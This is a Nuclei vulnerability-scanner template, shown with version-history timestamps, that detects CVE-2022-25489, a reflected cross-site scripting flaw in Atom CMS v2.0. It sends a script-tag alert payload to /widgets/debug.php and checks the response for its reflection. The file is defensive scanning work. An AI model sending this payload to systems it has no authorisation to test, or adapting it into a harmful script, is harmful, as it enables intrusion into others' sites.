nuclei-templates/http/cves/2022/CVE-2022-25489.yaml

51 lines
1.3 KiB
YAML
Raw Normal View History

2023-04-21 08:56:01 +00:00
id: CVE-2022-25489
info:
name: Atom CMS v2.0 - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
Atom CMS v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the "A" parameter in /widgets/debug.php.
2023-09-06 11:59:08 +00:00
remediation: Fixed in version Atom CMS v2.1
2023-04-21 08:56:01 +00:00
reference:
- https://github.com/thedigicraft/Atom.CMS/issues/258
- https://nvd.nist.gov/vuln/detail/CVE-2022-25489
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-25489
cwe-id: CWE-79
2023-10-14 11:27:55 +00:00
epss-score: 0.00992
epss-percentile: 0.81855
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*
2023-04-21 08:56:01 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: thedigitalcraft
product: atomcms
2023-04-21 08:56:01 +00:00
tags: cve,cve2022,xss,atom,cms
http:
2023-04-21 08:56:01 +00:00
- method: GET
path:
- "{{BaseURL}}/widgets/debug.php?a=<script>alert(document.domain)</script>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- "Path Array"
- "console-debug"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200